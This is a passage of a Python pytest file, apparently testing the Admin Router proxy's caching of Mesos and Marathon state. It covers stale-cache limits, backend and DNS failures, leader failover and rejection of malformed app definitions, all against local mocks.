        """Between soft and hard limits, stale `svcapps` data still serves requests."""
        filter_regexp = {
            'Marathon app request failed: invalid response status: 500':
                SearchCriteria(1, False),
            'Mesos state cache has been successfully updated':
                SearchCriteria(2, False),
            'Cache entry `svcapps` is stale':
                SearchCriteria(1, True),
        }
        ar = nginx_class(cache_max_age_soft_limit=3,
                         cache_max_age_hard_limit=1200,
                         cache_expiration=2,
                         cache_poll_period=3,
                         )
        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            # Break marathon
            mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                func_name='always_bork',
                                aux_data=True)
            # Wait for the cache to be old enough to be considered stale by AR:
            # cache_max_age_soft_limit + 1s for a good measure
            time.sleep(3 + 1)
            # Perform the main/test request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            lbf.scan_log_buffer()
        assert lbf.extra_matches == {}
    def test_if_broken_mesos_causes_mesos_cache_to_expire_and_requests_to_fail(
            self, nginx_class, mocker, valid_user_header):
        """Past the hard limit, a stale `mesosstate` cache makes agent requests fail with 503."""
        filter_regexp = {
            'Mesos state request failed: invalid response status: 500':
                SearchCriteria(1, False),
            'Marathon apps cache has been successfully updated':
                SearchCriteria(2, False),
            'Cache entry `mesosstate` is too old, aborting request':
                SearchCriteria(1, True),
        }
        ar = nginx_class(cache_poll_period=3,
                         cache_expiration=2,
                         cache_max_age_soft_limit=3,
                         cache_max_age_hard_limit=4,
                         )
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)
            # Trigger cache update using a request:
            ping_mesos_agent(ar, valid_user_header)
            # Break mesos
            mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                func_name='always_bork',
                                aux_data=True)
            # Wait for the cache to be old enough to be discarded by AR:
            # cache_max_age_hard_limit + 1s for good measure
            # must be more than cache_poll_period
            time.sleep(4 + 1)
            # Perform the main/test request:
            ping_mesos_agent(ar, valid_user_header, expect_status=503)
            lbf.scan_log_buffer()
        assert lbf.extra_matches == {}
    def test_if_temp_mesos_borkage_does_not_dirupt_caching(
            self, nginx_class, mocker, valid_user_header):
        """Between soft and hard limits, stale `mesosstate` data still serves requests."""
        filter_regexp = {
            'Mesos state request failed: invalid response status: 500':
                SearchCriteria(1, False),
            'Marathon apps cache has been successfully updated':
                SearchCriteria(2, False),
            'Cache entry `mesosstate` is stale':
                SearchCriteria(1, True),
        }
        ar = nginx_class(cache_poll_period=3,
                         cache_expiration=2,
                         cache_max_age_soft_limit=3,
                         cache_max_age_hard_limit=1800,
                         )
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)
            # Trigger cache update using a request:
            ping_mesos_agent(ar, valid_user_header)
            # Break mesos
            mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                func_name='always_bork',
                                aux_data=True)
            # Wait for the cache to be old enough to become stale:
            # cache_max_age_soft_limit + 1s for good measure
            time.sleep(3 + 1)
            # Perform the main/test request:
            ping_mesos_agent(ar, valid_user_header, expect_status=200)
            lbf.scan_log_buffer()
        assert lbf.extra_matches == {}
    def test_if_broken_marathon_does_not_break_mesos_cache(
            self, nginx_class, mocker, valid_user_header):
        """A failing Marathon backend must not prevent the Mesos cache from updating."""
        filter_regexp = {
            'Marathon app request failed: invalid response status: 500':
                SearchCriteria(1, True),
            'Mesos state cache has been successfully updated':
                SearchCriteria(1, True),
        }
        # Break marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='always_bork',
                            aux_data=True)
        ar = nginx_class()
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=(CACHE_FIRST_POLL_DELAY + 1),
                                   line_buffer=ar.stderr_line_buffer)
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()
        assert lbf.extra_matches == {}
    def test_if_broken_mesos_does_not_break_marathon_cache(
            self, nginx_class, mocker, valid_user_header):
        """A failing Mesos backend must not prevent the Marathon apps cache from updating."""
        filter_regexp = {
            'Mesos state request failed: invalid response status: 500':
                SearchCriteria(1, True),
            'Marathon apps cache has been successfully updated': SearchCriteria(1, True),
        }
        # Break mesos (the 127.0.0.2:5050 endpoint)
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='always_bork',
                            aux_data=True)
        ar = nginx_class()
        url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=(CACHE_FIRST_POLL_DELAY + 1),
                                   line_buffer=ar.stderr_line_buffer)
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            lbf.scan_log_buffer()
        assert resp.status_code == 200
        req_data = resp.json()
        assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'
        assert lbf.extra_matches == {}
    def test_if_changing_marathon_apps_is_reflected_in_cache(
            self, nginx_class, mocker, valid_user_header):
        """After the Marathon apps change, polling updates the routing within two periods."""
        cache_poll_period = 4
        ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
        url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
        with GuardedSubprocess(ar):
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'
            new_apps = {"apps": [SCHEDULER_APP_ALWAYSTHERE_DIFFERENTPORT, ]}
            mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                func_name='set_apps_response',
                                aux_data=new_apps)
            # First poll (2s) + normal poll interval(4s) < 2 * normal poll
            # interval(4s)
            time.sleep(cache_poll_period * 2)
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.15:16001'
    def test_if_changing_mesos_state_is_reflected_in_cache(
            self, nginx_class, mocker, valid_user_header):
        """A newly appearing Mesos agent becomes routable within two poll periods."""
        cache_poll_period = 4
        ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
        with GuardedSubprocess(ar):
            # Agent is not yet part of the mocked cluster state -> 404
            ping_mesos_agent(ar,
                             valid_user_header,
                             agent_id=EXTRA_AGENT_DICT['id'],
                             expect_status=404)
            mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                func_name='enable_extra_agent')
            # First poll (2s) + normal poll interval(4s) < 2 * normal poll
            # interval(4s)
            time.sleep(cache_poll_period * 2)
            ping_mesos_agent(ar,
                             valid_user_header,
                             agent_id=EXTRA_AGENT_DICT['id'],
                             endpoint_id='http://127.0.0.4:15003')
    def test_if_changing_marathon_leader_is_reflected_in_cache(
            self, nginx_class, mocker, valid_user_header):
        """A Marathon leader change propagates to routing within two poll periods."""
        cache_poll_period = 4
        ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)
        url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
        with GuardedSubprocess(ar):
            # let's make sure that current leader is the default one
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
            # change the leader and wait for cache to notice
            mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                func_name='change_leader',
                                aux_data="127.0.0.3:80")
            # First poll (2s) + normal poll interval(4s) < 2 * normal poll
            # interval(4s)
            time.sleep(cache_poll_period * 2)
            # now, let's see if the leader changed
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.3:80'
    def test_if_absence_of_marathon_leader_is_handled_by_cache(
            self, nginx_class, mocker, valid_user_header):
        """Without a Marathon leader, leader-proxy requests answer 503 instead of crashing."""
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='remove_leader')
        ar = nginx_class()
        url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
        with GuardedSubprocess(ar):
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 503
    def test_if_absence_of_agent_is_handled_by_cache(
            self, nginx_class, mocker, valid_user_header):
        """An agent ID unknown to the cached Mesos state yields a 404."""
        ar = nginx_class()
        with GuardedSubprocess(ar):
            ping_mesos_agent(
                ar,
                valid_user_header,
                agent_id='bdcd424a-b59e-4df4-b492-b54e38926bd8-S0',
                expect_status=404)
    def test_if_caching_works_for_mesos_state(
            self, nginx_class, mocker, valid_user_header):
        """Repeated agent requests are served from cache — only one upstream Mesos request."""
        # Enable recording for mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')
        ar = nginx_class()
        with GuardedSubprocess(ar):
            # Let the cache warm-up:
            time.sleep(CACHE_FIRST_POLL_DELAY + 1)
            for _ in range(3):
                ping_mesos_agent(ar, valid_user_header)
        mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                             func_name='get_recorded_requests')
        # 3 requests + only one upstream request == cache works
        assert len(mesos_requests) == 1
    def test_if_caching_works_for_marathon_apps(
            self, nginx_class, mocker, valid_user_header):
        """Repeated /service requests are served from cache, not by re-querying upstreams."""
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        # Enable recording for mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')
        ar = nginx_class()
        url = ar.make_url_from_path('/service/scheduler-alwaysthere/bar/baz')
        with GuardedSubprocess(ar):
            # Let the cache warm-up:
            time.sleep(CACHE_FIRST_POLL_DELAY + 1)
            for _ in range(5):
                resp = requests.get(url,
                                    allow_redirects=False,
                                    headers=valid_user_header)
            assert resp.status_code == 200
        mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                             func_name='get_recorded_requests')
        marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                func_name='get_recorded_requests')
        # 5 requests + only one upstream poll (one Mesos request, two Marathon
        # requests) == cache works
        assert len(mesos_requests) == 1
        assert len(marathon_requests) == 2
    def test_if_caching_works_for_marathon_leader(
            self, nginx_class, mocker, valid_user_header):
        """Repeated leader-proxy requests are served from cache, not by re-querying Marathon."""
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        ar = nginx_class()
        url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
        with GuardedSubprocess(ar):
            # Let the cache warm-up:
            time.sleep(CACHE_FIRST_POLL_DELAY + 1)
            for _ in range(5):
                resp = requests.get(url,
                                    allow_redirects=False,
                                    headers=valid_user_header)
            assert resp.status_code == 200
            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.2:80'
        marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                func_name='get_recorded_requests')
        # 5 requests + only two upstream Marathon requests (single poll) == cache works
        assert len(marathon_requests) == 2
    def test_if_broken_response_from_marathon_is_handled(
            self, nginx_class, mocker, valid_user_header):
        """Undecodable Marathon leader JSON is logged and results in a 503."""
        filter_regexp = {
            'Cannot decode marathon leader JSON': SearchCriteria(1, True),
        }
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='break_leader_reply')
        ar = nginx_class()
        url = ar.make_url_from_path('/system/v1/leader/marathon/foo/bar/baz')
        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=(CACHE_FIRST_POLL_DELAY + 1),
                                   line_buffer=ar.stderr_line_buffer)
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            lbf.scan_log_buffer()
        assert resp.status_code == 503
        assert lbf.extra_matches == {}
def test_if_failed_request_triggered_update_is_recovered_by_timers(
        self, nginx_class, valid_user_header, mocker, log_catcher):
    """A cache update that failed because the upstream was broken is
    retried and fixed by the timer-based poll once the upstream heals."""
    first_poll_delay = 3
    poll_period = 3
    cache_expiration = 2

    # Take cache invalidation out of the picture
    ar = nginx_class(cache_first_poll_delay=first_poll_delay,
                     cache_poll_period=poll_period,
                     cache_expiration=cache_expiration,
                     cache_max_age_soft_limit=1200,
                     cache_max_age_hard_limit=1800,
                     )

    # Make the mocked Mesos respond with an error to every request:
    mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                        func_name='always_bork',
                        aux_data=True)

    with GuardedSubprocess(ar):
        start = time.time()

        # Let's break the cache by making it update against broken Mesos:
        ping_mesos_agent(ar, valid_user_header, expect_status=503)
        time.sleep(1)
        # Let's make sure that the brokerage is still there
        ping_mesos_agent(ar, valid_user_header, expect_status=503)

        # Healing hands!
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='always_bork',
                            aux_data=False)

        # Let's wait for first poll to refresh cache
        time.sleep(1 + (first_poll_delay - (time.time() - start)))

        # Verify that the cache is OK now
        ping_mesos_agent(ar, valid_user_header)
def test_if_early_boot_stage_can_recover_from_a_bit_slow_backend(
        self, nginx_class, valid_user_header, mocker, log_catcher):
    # The idea here is to make Backend a bit slow, so that AR is still able
    # to update cache on first request.
    refresh_lock_timeout = 10
    backend_request_timeout = 5

    ar = nginx_class(cache_first_poll_delay=1,
                     cache_poll_period=3,
                     cache_expiration=2,
                     cache_max_age_soft_limit=1200,
                     cache_max_age_hard_limit=1800,
                     cache_backend_request_timeout=backend_request_timeout,
                     cache_refresh_lock_timeout=refresh_lock_timeout,
                     )

    agent_id = AGENT1_ID
    url = ar.make_url_from_path('/agent/{}/blah/blah'.format(agent_id))
    # Generate constant background load (3 req/s) while the cache warms up:
    v = Vegeta(log_catcher, target=url, jwt=valid_user_header, rate=3)

    # Make Mesos just a bit slow: stall each reply for 30% of
    # backend_request_timeout, i.e. slower than usual but still within
    # the timeout.
    mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                        func_name='always_stall',
                        aux_data=backend_request_timeout * 0.3)

    with GuardedSubprocess(ar):
        with GuardedSubprocess(v):
            time.sleep(backend_request_timeout * 0.3 + 1)  # let it warm-up!
            ping_mesos_agent(ar, valid_user_header)
def test_if_temp_dns_borkage_does_not_disrupt_mesosleader_caching(
        self, nginx_class, dns_server_mock, valid_user_header):
    """A temporarily broken `leader.mesos` DNS entry leaves the (stale)
    mesos-leader cache entry in use, so requests still succeed."""
    filter_regexp_pre = {
        'marathon leader cache has been successfully updated':
            SearchCriteria(1, True),
        'Marathon apps cache has been successfully updated':
            SearchCriteria(1, True),
        'Mesos state cache has been successfully updated':
            SearchCriteria(1, True),
        'mesos leader cache has been successfully updated':
            SearchCriteria(1, True),
    }
    filter_regexp_post = {
        'marathon leader cache has been successfully updated':
            SearchCriteria(1, True),
        'Marathon apps cache has been successfully updated':
            SearchCriteria(1, True),
        'Mesos state cache has been successfully updated':
            SearchCriteria(1, True),
        # The problem here is that there may occur two updates, one after
        # another, and the failed one will be retried. This stems directly
        # from how cache.lua works. Let's permit multiple occurrences for
        # now.
        'DNS server returned error code':
            SearchCriteria(1, False),
        'Cache entry `mesos_leader` is stale':
            SearchCriteria(1, True),
    }
    cache_max_age_soft_limit = 3

    ar = nginx_class(cache_max_age_soft_limit=cache_max_age_soft_limit,
                     cache_max_age_hard_limit=1200,
                     cache_expiration=2,
                     cache_poll_period=3,
                     cache_first_poll_delay=1,
                     )

    url = ar.make_url_from_path('/dcos-history-service/foo/bar')

    with GuardedSubprocess(ar):
        lbf = LineBufferFilter(filter_regexp_pre,
                               timeout=5,  # Just to give LBF enough time
                               line_buffer=ar.stderr_line_buffer)
        with lbf:
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
        assert lbf.extra_matches == {}

        lbf = LineBufferFilter(filter_regexp_post,
                               timeout=5,  # Just to give LBF enough time
                               line_buffer=ar.stderr_line_buffer)
        with lbf:
            # Break `leader.mesos` DNS entry
            dns_server_mock.remove_dns_entry('leader.mesos.')

            # Wait for the cache to be old enough to be considered stale by
            # AR:
            # cache_max_age_soft_limit + extra delay in order to avoid
            # race conditions
            delay = 2
            time.sleep(cache_max_age_soft_limit + delay)

            # Perform the main/test request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200
        assert lbf.extra_matches == {}
# This test would still pass 40-50% of the time if the fix were removed,
# hence we re-run it here 5 times.
@pytest.mark.parametrize('execution_number', range(5))
def test_if_mesos_leader_failover_is_followed_by_cache_http(
        self,
        nginx_class,
        valid_user_header,
        mocker,
        dns_server_mock,
        execution_number):
    """After `leader.mesos` starts resolving to a new IP, the cache
    refresh must follow the failover and poll the new leader (exactly
    one state request per mock)."""
    # Nginx resolver enforces 5s (grep for `resolver ... valid=Xs`), so it
    # is VERY important to use cache pool period of >5s.
    cache_poll_period = 6
    ar = nginx_class(
        cache_poll_period=cache_poll_period,
        cache_expiration=cache_poll_period - 1,
        upstream_mesos="http://leader.mesos:5050",
    )
    # Enable recording for Mesos mocks:
    mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                        func_name='record_requests')
    mocker.send_command(endpoint_id='http://127.0.0.3:5050',
                        func_name='record_requests')
    dns_server_mock.set_dns_entry('leader.mesos.', ip="127.0.0.2", ttl=2)

    with GuardedSubprocess(ar):
        # Force cache refresh early, so that we do not have to wait too
        # long
        ping_mesos_agent(ar,
                         valid_user_header,
                         agent_id=EXTRA_AGENT_DICT['id'],
                         expect_status=404)

        dns_server_mock.set_dns_entry('leader.mesos.', ip="127.0.0.3", ttl=2)

        # Wait long enough for at least one full cache-refresh cycle to
        # run against the new leader address (two poll periods):
        time.sleep(cache_poll_period * 2)

        mesosmock_pre_reqs = mocker.send_command(
            endpoint_id='http://127.0.0.2:5050',
            func_name='get_recorded_requests')
        mesosmock_post_reqs = mocker.send_command(
            endpoint_id='http://127.0.0.3:5050',
            func_name='get_recorded_requests')
        assert len(mesosmock_pre_reqs) == 1
        assert len(mesosmock_post_reqs) == 1
class TestCacheMesosLeader:
    """Tests for AR's `mesos_leader` cache entry (leader discovery,
    locality resolution, DNS failures) and for cache-refresh requests."""

    def test_if_unset_hostip_var_is_handled(self, nginx_class, valid_user_header):
        """When AR does not know its own host IP, it logs the fact but
        still updates the mesos-leader cache."""
        filter_regexp = {
            'Private IP address of the host is unknown, ' +
            'aborting cache-entry creation for mesos leader':
                SearchCriteria(1, True),
            'mesos leader cache has been successfully updated':
                SearchCriteria(1, True),
        }
        ar = nginx_class(host_ip=None)

        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   line_buffer=ar.stderr_line_buffer)
            # Just trigger the cache update:
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()

        assert lbf.extra_matches == {}

    def test_if_missing_mesos_leader_entry_is_handled(
            self, nginx_class, valid_user_header, dns_server_mock):
        """A missing `leader.mesos` DNS record produces a DNS error log
        entry and no successful mesos-leader cache update."""
        filter_regexp = {
            'Failed to instantiate the resolver': SearchCriteria(0, True),
            'DNS server returned error code': SearchCriteria(1, True),
            'mesos leader cache has been successfully updated':
                SearchCriteria(0, True),
        }
        ar = nginx_class()

        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp,
                                   line_buffer=ar.stderr_line_buffer)
            # Unfortunately there are upstreams that use `leader.mesos` and
            # removing this entry too early will result in Nginx failing to start.
            # So we need to do it right after nginx starts, but before first
            # cache update.
            time.sleep(1)
            dns_server_mock.remove_dns_entry('leader.mesos.')

            # Now let's trigger the cache update:
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()

        assert lbf.extra_matches == {}

    def test_if_mesos_leader_locality_is_resolved(
            self, nginx_class, valid_user_header, dns_server_mock):
        """AR distinguishes a non-local mesos leader from a local one and
        re-resolves the locality after the DNS entry changes."""
        cache_poll_period = 4
        nonlocal_leader_ip = "127.0.0.3"
        local_leader_ip = "127.0.0.2"
        filter_regexp_pre = {
            'Failed to instantiate the resolver': SearchCriteria(0, True),
            'mesos leader is non-local: `{}`'.format(nonlocal_leader_ip):
                SearchCriteria(1, True),
            'Private IP address of the host is unknown, ' +
            'aborting cache-entry creation for mesos leader':
                SearchCriteria(0, True),
            'mesos leader cache has been successfully updated':
                SearchCriteria(1, True),
        }
        filter_regexp_post = {
            'Failed to instantiate the resolver': SearchCriteria(0, True),
            'mesos leader is local': SearchCriteria(1, True),
            'Private IP address of the host is unknown, ' +
            'aborting cache-entry creation for mesos leader':
                SearchCriteria(0, True),
            'mesos leader cache has been successfully updated':
                SearchCriteria(1, True),
        }
        dns_server_mock.set_dns_entry('leader.mesos.', ip=nonlocal_leader_ip)

        ar = nginx_class(cache_poll_period=cache_poll_period, cache_expiration=3)

        with GuardedSubprocess(ar):
            lbf = LineBufferFilter(filter_regexp_pre,
                                   line_buffer=ar.stderr_line_buffer)
            # Just trigger the cache update:
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()

            assert lbf.extra_matches == {}

            dns_server_mock.set_dns_entry('leader.mesos.', ip=local_leader_ip)
            # Wait long enough for a full cache-refresh cycle to pick up
            # the new, local leader address (two poll periods):
            time.sleep(cache_poll_period * 2)

            lbf = LineBufferFilter(filter_regexp_post,
                                   line_buffer=ar.stderr_line_buffer)
            # Just trigger the cache update:
            ping_mesos_agent(ar, valid_user_header)
            lbf.scan_log_buffer()

            assert lbf.extra_matches == {}

    def test_if_backend_requests_have_useragent_set_correctly(
            self, nginx_class, mocker, valid_user_header):
        """Cache-refresh requests sent to Mesos and Marathon carry the
        'Master Admin Router' User-Agent header."""
        # Enable recording for marathon
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='record_requests')
        # Enable recording for Mesos
        mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                            func_name='record_requests')

        # Make regular polling occur later than usual, so that we get a single
        # cache refresh:
        ar = nginx_class(cache_poll_period=60, cache_expiration=55)

        with GuardedSubprocess(ar):
            # Initiate cache refresh by issuing a request:
            ping_mesos_agent(ar, valid_user_header)

            mesos_requests = mocker.send_command(endpoint_id='http://127.0.0.2:5050',
                                                 func_name='get_recorded_requests')
            marathon_requests = mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                                                    func_name='get_recorded_requests')

            assert len(mesos_requests) == 1
            assert len(marathon_requests) == 2

            # We could use a loop here, but let's make it a bit easier to debug:
            verify_header(mesos_requests[0]['headers'],
                          'User-Agent',
                          'Master Admin Router')
            verify_header(marathon_requests[0]['headers'],
                          'User-Agent',
                          'Master Admin Router')
            verify_header(marathon_requests[1]['headers'],
                          'User-Agent',
                          'Master Admin Router')
class TestCacheMarathon:
    """Tests for AR's Marathon service-apps (svcapps) cache: endpoint
    resolution for the different app/networking flavours and rejection
    of malformed app definitions."""

    def test_ip_per_task_app_with_user_networking_and_portmappings(
            self, nginx_class, mocker, valid_user_header):
        """IP-per-task app with USER networking resolves to the task IP
        and the container port taken from `portMappings`."""
        app = self._scheduler_alwaysthere_app()
        app['ipAddress'] = {'networkName': 'samplenet'}
        app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'
        app['container']['docker']['network'] = "USER"
        app['container']['docker']['portMappings'][0]['containerPort'] = '80'

        ar = nginx_class()
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_apps_response',
                            aux_data={"apps": [app]})

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200

            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.2:80'

    def test_ip_per_task_app_with_user_networking_and_portdefinitions(
            self, nginx_class, mocker, valid_user_header):
        """IP-per-task app with USER networking resolves to the task IP
        and the port taken from `portDefinitions`."""
        app = self._scheduler_alwaysthere_app()
        app['ipAddress'] = {'networkName': 'samplenet'}
        app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'
        app['container']['docker']['network'] = "USER"
        app['portDefinitions'] = [
            {
                "port": 80,
                "protocol": "tcp",
                "labels": {}
            },
        ]

        ar = nginx_class()
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_apps_response',
                            aux_data={"apps": [app]})

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200

            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.2:80'

    def test_ip_per_task_app_without_user_networking(
            self, nginx_class, mocker, valid_user_header):
        """IP-per-task app without USER networking resolves to the task
        IP and the port taken from `ipAddress.discovery.ports`."""
        app = self._scheduler_alwaysthere_app()
        app['ipAddress'] = {
            'networkName': 'samplenet',
            'discovery': {
                "ports": [
                    {"number": 80, "name": "http", "protocol": "tcp"}
                ]
            }
        }
        app['tasks'][0]['ipAddresses'][0]['ipAddress'] = '127.0.0.2'

        ar = nginx_class()
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_apps_response',
                            aux_data={"apps": [app]})

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200

            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.2:80'

    def test_ip_per_task_app_with_unspecified_ip_address_DCOS_OSS_1366(
            self, nginx_class, mocker, valid_user_header):
        """
        Test that an app that, instead of specifying 'ipAddress: null' does not
        specify 'ipAddress' at all, is successfully cached.
        """
        app = self._scheduler_alwaysthere_app()
        # Remove the 'ipAddress' key completely, thereby triggering DCOS_OSS-1366.
        del(app["ipAddress"])

        ar = nginx_class()
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_apps_response',
                            aux_data={"apps": [app]})

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            assert resp.status_code == 200

            req_data = resp.json()
            assert req_data['endpoint_id'] == 'http://127.0.0.1:16000'

    def test_upstream_wrong_json(
            self, nginx_class, mocker, valid_user_header):
        """Non-JSON apps reply from Marathon is logged and results in a
        503 with an 'invalid svcapps cache' message."""
        filter_regexp = {
            "Cannot decode Marathon apps JSON: ": SearchCriteria(1, True),
        }
        ar = nginx_class()

        # Set wrong non-json response content
        mocker.send_command(endpoint_id='http://127.0.0.1:8080',
                            func_name='set_encoded_response',
                            aux_data=b"wrong response")

        url = ar.make_url_from_path('/service/scheduler-alwaysthere/foo/bar/')
        with GuardedSubprocess(ar):
            # Register Line buffer filter:
            lbf = LineBufferFilter(filter_regexp,
                                   timeout=5,  # Just to give LBF enough time
                                   line_buffer=ar.stderr_line_buffer)

            # Trigger cache update by issuing request:
            resp = requests.get(url,
                                allow_redirects=False,
                                headers=valid_user_header)
            expected = "503 Service Unavailable: invalid Marathon svcapps cache"
            assert expected == resp.content.decode('utf-8').strip()
            assert resp.status_code == 503

            lbf.scan_log_buffer()

        assert lbf.extra_matches == {}

    def test_app_without_labels(
            self, nginx_class, mocker, valid_user_header):
        """An app with no `labels` key at all is rejected and logged."""
        app = self._scheduler_alwaysthere_app()
        app.pop("labels", None)

        filter_regexp = {
            "Labels not found in app '{}'".format(app["id"]): SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_service_scheme_label(
            self, nginx_class, mocker, valid_user_header):
        """An app missing the DCOS_SERVICE_SCHEME label is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["labels"].pop("DCOS_SERVICE_SCHEME", None)

        filter_regexp = {
            "Cannot find DCOS_SERVICE_SCHEME for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_without_port_index_label(
            self, nginx_class, mocker, valid_user_header):
        """An app missing the DCOS_SERVICE_PORT_INDEX label is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["labels"].pop("DCOS_SERVICE_PORT_INDEX", None)

        filter_regexp = {
            "Cannot find DCOS_SERVICE_PORT_INDEX for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
            filter_regexp, app, nginx_class, mocker, valid_user_header)

    def test_app_with_port_index_nan_label(
            self, nginx_class, mocker, valid_user_header):
        """A non-numeric DCOS_SERVICE_PORT_INDEX label is rejected."""
        app = self._scheduler_alwaysthere_app()
        app["labels"]["DCOS_SERVICE_PORT_INDEX"] = "not a number"

        filter_regexp = {
            "Cannot convert port to number for app '{}'".format(app["id"]):
                SearchCriteria(1, True),
        }

        self._assert_filter_regexp_for_invalid_app(
